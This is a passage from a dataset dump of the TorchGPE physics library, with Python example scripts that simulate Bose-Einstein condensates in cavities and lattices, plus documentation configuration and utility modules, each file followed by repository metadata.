im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z)%np.pi, shading='auto', cmap="twilight", vmin=0, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
cbar = plt.colorbar(im0, ax = ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("blue_self_organization_imaginary_time.png")
plot_pd(depths, detunings, alphas)
| 3,150 | Python | .py | 53 | 55.339623 | 178 | 0.672318 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,159 | blue_self_organization_real_time.py | qo-eth_TorchGPE/examples/blue_self_organization/real_time/blue_self_organization_real_time.py | from datetime import datetime
from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
ramp = config["boundaries"]["lattice_ramp"]
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.tensor([ramp(t) for t in torch.arange(0, config["propagation"]["real_time"]["final_time"], config["propagation"]["real_time"]["time_step"])])
alphas = torch.tensor(np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc = "Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
cavity = DispersiveCavity(lattice_depth=ramp, cavity_detuning=detuning, **config["potentials"]["cavity"])
cavityMonitor = CavityMonitor(cavity)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
bec.propagate(potentials = [trap, contact, cavity], callbacks=[cavityMonitor], **config["propagation"]["real_time"])
alphas[d_idx] = cavityMonitor.alpha[0]
def pi_tick_formatter(val, pos):
if val == 0: return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x,y,z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)), shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax = ax[0], orientation='vertical', label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z), shading='auto', cmap="twilight", vmin=-np.pi, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
cbar = plt.colorbar(im0, ax = ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("blue_self_organization_real_time.png")
plot_pd(depths, detunings, alphas)
| 3,253 | Python | .py | 55 | 55.327273 | 178 | 0.679621 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,160 | cavity_self_organization_imaginary_time.py | qo-eth_TorchGPE/examples/cavity_self_organization/imaginary_time/cavity_self_organization_imaginary_time.py | from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
from datetime import datetime
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32,
complex_dtype=torch.complex64)
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.linspace(*config["boundaries"]["lattice_depth"])
alphas = torch.tensor(
np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc="Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
for p_idx, pump in enumerate(tqdm(depths, smoothing=0, desc="Row", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=False)):
cavity = DispersiveCavity(
lattice_depth=pump, cavity_detuning=detuning, **config["potentials"]["cavity"])
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(
2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact, cavity], callbacks=[],
**config["propagation"]["imaginary_time"])
alphas[d_idx, p_idx] = cavity.get_alpha(bec.psi)
def pi_tick_formatter(val, pos):
if val == 0:
return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x, y, z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)),
shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax=ax[0], orientation='vertical',
label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
ax[0].axhline(y=config["gas"]["N_particles"]*config["potentials"]["cavity"]["cavity_coupling"]
** 2/(2*config["potentials"]["cavity"]["atomic_detuning"])/1e6, color="red", ls="dashed")
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z), shading='auto',
cmap="twilight", vmin=-np.pi, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax=ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(
pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("cavity_self_organization_imaginary_time.png")
plot_pd(depths, detunings, alphas)
#Â ! check meshgrid indexing and plotting | 3,533 | Python | .py | 66 | 47.560606 | 157 | 0.643148 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,161 | cavity_self_organization_real_time.py | qo-eth_TorchGPE/examples/cavity_self_organization/real_time/cavity_self_organization_real_time.py | from torchgpe.bec2D import Gas
from torchgpe.bec2D.callbacks import CavityMonitor
from torchgpe.bec2D.potentials import Contact, DispersiveCavity, Trap
from torchgpe.utils.potentials import linear_ramp
from torchgpe.utils import parse_config
from datetime import datetime
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar
from tqdm.auto import tqdm
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
ramp = config["boundaries"]["lattice_ramp"]
detunings = torch.linspace(*config["boundaries"]["cavity_detuning"])
depths = torch.tensor([ramp(t) for t in torch.arange(0, config["propagation"]["real_time"]["final_time"], config["propagation"]["real_time"]["time_step"])])
alphas = torch.tensor(np.empty((detunings.shape[0], depths.shape[0]), dtype=complex))
for d_idx, detuning in enumerate(tqdm(detunings, smoothing=0, desc = "Phase diagram", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]')):
cavity = DispersiveCavity(lattice_depth=ramp, cavity_detuning=detuning, **config["potentials"]["cavity"])
cavityMonitor = CavityMonitor(cavity)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
bec.propagate(potentials = [trap, contact, cavity], callbacks=[cavityMonitor], **config["propagation"]["real_time"])
alphas[d_idx] = cavityMonitor.alpha[0]
def pi_tick_formatter(val, pos):
if val == 0: return 0
if (val/np.pi*4) % 4 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*4)==1 else int(val/np.pi*4)}\\pi / 4$"
def plot_pd(x, y, z):
fig, ax = plt.subplots(1, 2, figsize=(8, 3))
ax = ax.flatten()
im0 = ax[0].pcolormesh(x, y/1e6, np.log10(np.abs(z)), shading='auto', cmap="viridis")
ax[0].set_xlabel(r"$V_i$ [$E_r$]")
ax[0].set_ylabel(r"$\Delta_c$ [$MHz$]")
plt.colorbar(im0, ax = ax[0], orientation='vertical', label="$\\log|\\alpha|$")
x_left, x_right = ax[0].get_xlim()
y_low, y_high = ax[0].get_ylim()
ax[0].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
ax[0].axhline(y=config["gas"]["N_particles"]*config["potentials"]["cavity"]["cavity_coupling"]**2/(2*config["potentials"]["cavity"]["atomic_detuning"])/1e6, color="red", ls="dashed")
im0 = ax[1].pcolormesh(x, y/1e6, np.angle(z), shading='auto', cmap="twilight", vmin=-np.pi, vmax=np.pi)
ax[1].set_xlabel(r"$V_i$ [$E_r$]")
ax[1].set_ylabel(r"$\Delta_c$ [$MHz$]")
cbar = plt.colorbar(im0, ax = ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("cavity_self_organization_real_time.png")
plot_pd(depths, detunings, alphas)
#Â ! check meshgrid indexing and plotting | 3,487 | Python | .py | 57 | 57.368421 | 186 | 0.680118 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,162 | raman_nath.py | qo-eth_TorchGPE/examples/raman_nath/raman_nath.py | from datetime import datetime
from torchgpe.bec2D import Gas
from torchgpe.bec2D.potentials import Contact, Trap, Lattice
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar, codata
from tqdm.auto import tqdm
import scipy.constants as spconsts
def plot_bec(a, lat):
fig, ax = plt.subplots(1, 2, figsize=(12, 5))
im0 = ax[0].pcolormesh(a.X.cpu(), a.Y.cpu(), (torch.abs(a.psi)**2).cpu(), vmin=0, shading='auto')
ax[0].set_xlabel(r"$x$")
ax[0].set_ylabel(r"$y$")
plt.colorbar(im0, ax=ax[0], orientation='vertical')
im = ax[1].pcolormesh(a.Kx.cpu(), a.Ky.cpu(), torch.abs(a.psik).cpu(), shading='auto')
ax[1].set_ylim([-30, 30])
ax[1].set_xlim([-30, 30])
ax[1].set_ylabel(r"$k_y$")
ax[1].set_xlabel(r"$k_x$")
k2 = 2*2*np.pi*(a.adim_length/lat.lam) #adimentionalized 2k vector
circle1=plt.Circle((k2, 0),2, fill=False, edgecolor='red')
circle2=plt.Circle((-k2, 0),2, fill=False, edgecolor='red')
ax[1].add_patch(circle1)
ax[1].add_patch(circle2)
plt.colorbar(im, ax=ax[1], orientation='vertical')
ax[0].set_aspect("equal")
ax[1].set_aspect("equal")
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
fig.tight_layout()
plt.savefig("raman_nath.png")
if __name__ == "__main__":
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
#Apply pulse of TP for 15 us and 10 Erecoil lattice
lattice = Lattice(V0 = 10, lam=1e-6)
bec.propagate(final_time=0.000015, time_step=config["propagation"]["real_time"]["time_step"], potentials=[trap, contact, lattice], callbacks=[])
#Time evolution after the pulse
bec.propagate(final_time=0.0014, time_step=config["propagation"]["real_time"]["time_step"], potentials=[contact], callbacks=[])
plot_bec(bec, lattice)
| 2,346 | Python | .py | 48 | 44.708333 | 148 | 0.675557 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,163 | thomas_fermi_profile.py | qo-eth_TorchGPE/examples/thomas_fermi_profile/thomas_fermi_profile.py | from torchgpe.bec2D import Gas
from torchgpe.bec2D.potentials import Contact, Trap
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from scipy.constants import hbar, physical_constants
from datetime import datetime
a_bohr = physical_constants["Bohr radius"][0]
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact(**config["potentials"]["contact"])
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
U0 = np.sqrt(8*np.pi)*config["gas"]["N_particles"]*config["potentials"]["contact"]["a_s"]*a_bohr/config["potentials"]["contact"]["a_orth"]*hbar**2/bec.mass
U0_prime = U0/(hbar*bec.adim_pulse*bec.adim_length**2)
mu_prime = np.sqrt(bec.mass*U0*(2*np.pi)**2*config["potentials"]["trap"]["omegax"]*config["potentials"]["trap"]["omegay"]/np.pi)/(hbar*bec.adim_pulse)
V = 2*(np.pi/bec.adim_pulse)**2*((config["potentials"]["trap"]["omegax"]*bec.X)**2+(config["potentials"]["trap"]["omegay"]*bec.Y)**2)
tf_density = (mu_prime-V)/U0_prime * torch.heaviside(mu_prime-V, torch.zeros_like(bec.X))
fig, ax = plt.subplots(1, 1, figsize=(7,4))
ax.plot(bec.x.cpu(), tf_density[bec.psi.shape[0]//2,:].cpu(), label="Thomas-Fermi", ls="dashed", c="red")
ax.plot(bec.x.cpu(), bec.density[bec.psi.shape[0]//2,:].cpu(), label="GPE")
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$")
plt.legend()
plt.title(datetime.now().strftime("%d %b %Y %H:%M:%S"))
fig.savefig("thomas_fermi_profile.png")
| 1,813 | Python | .py | 30 | 58.9 | 155 | 0.705483 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,164 | conf.py | qo-eth_TorchGPE/docs/source/conf.py | # Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
import importlib.metadata
__version__ = importlib.metadata.version("torchgpe")
project = 'TorchGPE'
copyright = '2024, Quantum Optics group @ ETH Zurich'
author = 'Quantum Optics group @ ETH Zurich'
release = __version__
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
extensions = [
"sphinx.ext.napoleon",
"sphinx.ext.autodoc",
"sphinx.ext.mathjax",
"sphinx_design",
"sphinx.ext.viewcode",
"sphinx_copybutton",
"sphinx.ext.autosummary",
]
templates_path = ['_templates']
exclude_patterns = []
autodoc_typehints = "description"
# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
html_theme = "pydata_sphinx_theme"
html_static_path = ['_static']
html_css_files = ["style.css"]
html_theme_options = {
"footer_items": ["copyright", "sphinx-and-theme-versions"],
"navbar_end": ["theme-switcher","navbar-icon-links"],
"secondary_sidebar_items": ["page-toc"],
"navbar_persistent": [],
"primary_sidebar_end": [],
"logo": {
"text": "TorchGPE package documentation"
},
"favicons": [
{
"rel": "icon",
"sizes": "32x32",
"href": "https://www.quantumoptics.ethz.ch/favicon.ico",
}
],
"icon_links": [
{
"name": "PyPI",
"url": "https://pypi.org/project/torchgpe",
"icon": "fa-solid fa-box",
},
{
"name": "GitHub",
"url": "https://github.com/qo-eth/TorchGPE",
"icon": "fa-brands fa-github",
}
]
}
html_sidebars = {
"**": ["searchbox.html", "sidebar-nav-bs"]
}
autosummary_generate = True
autodoc_default_flags = ['members', 'undoc-members'] | 2,262 | Python | .py | 65 | 30.123077 | 87 | 0.605769 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,165 | configuration.py | qo-eth_TorchGPE/torchgpe/utils/configuration.py | import warnings
import yaml
from math import sqrt
import re
from scipy. constants import pi, hbar, c
from .potentials import linear_ramp, quench, s_ramp
# The global variables that are available to the !eval tag
__globals = {
# Prevents the user from accessing builtins
'__builtins__': None,
# Allows the user to access the sqrt method from the math module
"sqrt": sqrt,
# Allows the user to access the linear_ramp, quench, and s_ramp methods from the potentials2D module
"linear_ramp": linear_ramp,
"s_ramp": s_ramp,
"quench": quench,
# Allows the user to access the pi, hbar, and c constants from the scipy.constants module
"pi": pi,
"hbar": hbar,
"c": c,
}
def __config_tag_evaluate(loader, node):
"""Evaluates a YAML tag of the form !eval <expression> [locals]
Args:
loader (yaml.Loader): The YAML loader.
node (yaml.Node): The YAML node.
"""
expression = loader.construct_scalar(node.value[0])
locals = {} if len(
node.value) == 1 else loader.construct_mapping(node.value[1])
if any(key in locals for key in __globals.keys()):
warnings.warn(
f"{', '.join(__globals.keys())} are reserved keywords and are set to the respective constants. By specifying them, their value is overwritten")
return eval(expression, __globals, locals)
# Regex for parsing exponential numbers
# Taken from https://stackoverflow.com/questions/30458977/how-to-parse-exponential-numbers-with-pyyaml
__config_exponential_resolver =\
re.compile(u'''^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$''', re.X)
def parse_config(path):
"""Parses a YAML configuration file.
Args:
path (str): The path to the configuration file.
Returns:
dict: The parsed configuration.
Raises:
yaml.YAMLError: If the configuration file is not valid YAML.
"""
loader = yaml.SafeLoader
loader.add_implicit_resolver(
u'tag:yaml.org,2002:float', __config_exponential_resolver, list(u'-+0123456789.'))
loader.add_constructor('!eval', __config_tag_evaluate)
with open(path, "r") as file:
return yaml.load(file, Loader=loader)
| 2,390 | Python | .py | 59 | 35.40678 | 155 | 0.640449 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,166 | potentials.py | qo-eth_TorchGPE/torchgpe/utils/potentials.py | from abc import ABCMeta, abstractmethod
import torch
# --- Time dependent parameters ---
def time_dependent_variable(var):
"""Transform a variable into a function of time
Args:
var (Union[float, Callable]): The variable to transform. If it is a function, it is returned as is. If it is a constant, it is transformed into a function that returns the constant.
Examples:
>>> time_dependent_variable(1)
lambda _: 1
>>> time_dependent_variable(lambda t: t)
lambda t: t
"""
return var if callable(var) else (lambda _: var)
def any_time_dependent_variable(*vars):
"""Check if any of the variables is time dependent
Args:
*vars (Union[float, Callable]): The variables to check. If any of them is a function, the function returns True. If all of them are constants, the function returns False.
Examples:
>>> any_time_dependent_variable(1, 2, 3)
False
>>> any_time_dependent_variable(1, lambda t: t, 3)
True
"""
return any(map(callable, vars))
# --- Common behaviours in time ---
def linear_ramp(v0=0, t0=0, v1=1, t1=1):
"""Implements a linear ramp from :math:`v_0` to :math:`v_1` between :math:`t_0` and :math:`t_1`. The ramp is constant outside of the interval.
Args:
v0 (float, optional): The initial value of the ramp. Defaults to :math:`0`.
t0 (float, optional): The initial time of the ramp. Defaults to :math:`0`.
v1 (float, optional): The final value of the ramp. Defaults to :math:`1`.
t1 (float, optional): The final time of the ramp. Defaults to :math:`1`.
Returns:
callable: A function that returns the value of the ramp at time :math:`t`
"""
return lambda t: v0 if t < t0 else v0 + (v1-v0)*(t-t0)/(t1-t0) if t < t1 else v1
def s_ramp(v0=0, t0=0, v1=1, t1=1):
"""Implements a smooth ramp from :math:`v_0` to :math:`v_1` between :math:`t_0` and :math:`t_1`. The ramp is constant outside of the interval.
Args:
v0 (float, optional): The initial value of the ramp. Defaults to :math:`0`.
t0 (float, optional): The initial time of the ramp. Defaults to :math:`0`.
v1 (float, optional): The final value of the ramp. Defaults to :math:`1`.
t1 (float, optional): The final time of the ramp. Defaults to :math:`1`.
Returns:
callable: A function that returns the value of the ramp at time :math:`t`
"""
return lambda t: v0 if t < t0 else v0 - 2*(v1-v0)*((t-t0)/(t1-t0))**3 + 3*(v1-v0)*((t-t0)/(t1-t0))**2 if t < t1 else v1
def quench(v0=1, v1=0, quench_time=1):
"""Implements a quench from :math:`v_0` to :math:`v_1` at :math:`t=quench_time`. The value is constant outside of the interval.
Args:
v0 (float, optional): The initial value. Defaults to :math:`1`.
v1 (float, optional): The final value. Defaults to :math:`0`.
quench_time (float, optional): The time at which the quench occurs. Defaults to :math:`1`.
Returns:
float: The value of the quench at time :math:`t`
"""
return lambda t: v0 if t < quench_time else v1
# --- Potential base classes ---
class Potential(metaclass=ABCMeta):
"""Base class for potentials. It is not meant to be used directly, but to be inherited by other classes.
"""
def __init__(self):
#: bool: Whether the potential is time dependent or not
self.is_time_dependent = False
#: gpe.bec2D.gas.Gas: The :class:`~gpe.bec2D.gas.Gas` object to which the potential is applied
self.gas = None
def set_gas(self, gas):
"""Set the :class:`~gpe.bec2D.gas.Gas` object to which the potential is applied
Args:
gas (Gas): The :class:`~gpe.bec2D.gas.Gas` object to which the potential is applied
"""
self.gas = gas
def on_propagation_begin(self):
"""Called at the beginning of the propagation. It is used to post-process the parameters of the potential, once the :class:`~gpe.bec2D.gas.Gas` object has been set."""
pass
class LinearPotential(Potential, metaclass=ABCMeta):
"""Base class for linear 2D potentials. It is not meant to be used directly, but to be inherited by other classes.
"""
def __init__(self):
super().__init__()
@abstractmethod
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
"""Return the linear potential evaluated on the grid. If time dependent parameters are present, the parameter ``time`` is also specified, otherwise it is set to ``None``.
Args:
X (torch.tensor): The X coordinates on the adimentionalized grid where to compute the potential.
Y (torch.tensor): The Y coordinates on the adimentionalized grid where to compute the potential.
time (float, optional): If time dependent parameters are specified, the time at which to evaluate the potential. Defaults to None.
Returns:
torch.tensor: The potential evaluated on the grid.
"""
pass
class NonLinearPotential(Potential, metaclass=ABCMeta):
"""Base class for non-linear 2D potentials. It is not meant to be used directly, but to be inherited by other classes.
"""
def __init__(self):
super().__init__()
@abstractmethod
def potential_function(self, X: torch.tensor, Y: torch.tensor, psi: torch.tensor, time: float = None):
"""Return the non-linear potential evaluated on the grid. If time dependent parameters are present, the parameter ``time`` is also specified, otherwise it is set to ``None``.
Args:
X (torch.tensor): The X coordinates on the adimentionalized grid where to compute the potential.
Y (torch.tensor): The Y coordinates on the adimentionalized grid where to compute the potential.
psi (torch.tensor): The wave function of the gas.
time (float, optional): If time dependent parameters are specified, the time at which to evaluate the potential. Defaults to None.
Returns:
torch.tensor: The potential evaluated on the grid.
"""
pass
| 6,182 | Python | .py | 109 | 49.174312 | 189 | 0.658917 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,167 | plotting.py | qo-eth_TorchGPE/torchgpe/utils/plotting.py | import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable
import numpy as np
def pi_tick_formatter(val, _):
"""Formats a tick value in multiples of pi.
Args:
val (float): The tick value.
_ (int): The tick position.
"""
if val == 0:
return 0
if (val/np.pi*2) % 2 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*2)==1 else int(val/np.pi*2)}\\pi / 2$"
| 565 | Python | .py | 14 | 35.071429 | 104 | 0.597806 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,168 | __init__.py | qo-eth_TorchGPE/torchgpe/utils/__init__.py | import torch
from .configuration import parse_config
import functools
import operator
def ftn(f):
"""Performs an n-dimensional Fourier transform.
Args:
f (torch.Tensor): The function to transform.
"""
return torch.fft.fftshift(torch.fft.fftn(torch.fft.ifftshift(f), norm="ortho"))
def iftn(fk):
"""Performs an n-dimensional inverse Fourier transform.
Args:
fk (torch.Tensor): The function to anti-transform.
"""
return torch.fft.fftshift(torch.fft.ifftn(torch.fft.ifftshift(fk), norm="ortho"))
def normalize_wavefunction(wavefunction, *d):
"""Normalizes a wavefunction.
Args:
wavefunction (torch.Tensor): The wavefunction to normalize.
*d (float): The grid spacing in all the dimensions.
"""
return wavefunction / torch.sqrt((torch.abs(wavefunction) ** 2).sum() * functools.reduce(operator.mul, d))
def prompt_yes_no(prompt, default=None):
"""
Prompts the user with a yes/no question until a valid choice is made.
Args:
prompt (str): The prompt to display to the user.
default (bool, optional): The default value to return if the user does not provide a valid input.
Returns:
bool: True if the user responded "y", False if the user responded "n", or the value of the default parameter if specified and the user did not provide a valid input.
"""
while True:
response = input(prompt).strip().lower()
if response == "y":
return True
elif response == "n":
return False
elif default is not None and response == "":
return default
else:
print('Invalid input. Please enter "y" or "n".')
def enumerate_chunk(l, n):
"""Enumerates a list l in chunks of size n.
Args:
l (list): The list to enumerate.
n (int): The size of each chunk.
"""
for i in range(0, len(l), n):
yield zip(range(i, i + n), l[i: i + n])
| 1,974 | Python | .py | 50 | 32.96 | 173 | 0.652311 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,169 | elements.py | qo-eth_TorchGPE/torchgpe/utils/elements.py | import scipy.constants as spconsts
import numpy as np
# A dictionary of elements.
#: dict(str, dict(str, float)): The dictionary of implemented elements. The keys are the element symbols, and the values are dictionaries of properties. The currently implemnted elements are ``'87Rb'`` and ``'39K'``, while the available properties are: ``m`` (mass), ``omega d2`` (:math:`d_2` line pulse).
elements_dict = {
"87Rb": {
"m": spconsts.physical_constants["atomic mass constant"][0] * 87,
"omega d2": 2 * np.pi * 384.2304844685e12,
},
"39K": {
"m": spconsts.physical_constants["atomic mass constant"][0] * 39,
"omega d2": 2 * np.pi * 391.01617003e12,
},
}
| 701 | Python | .py | 14 | 45.357143 | 306 | 0.660819 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,170 | callbacks.py | qo-eth_TorchGPE/torchgpe/utils/callbacks.py | import torch
from abc import ABCMeta
class Callback(metaclass=ABCMeta):
"""Base class for callbacks.
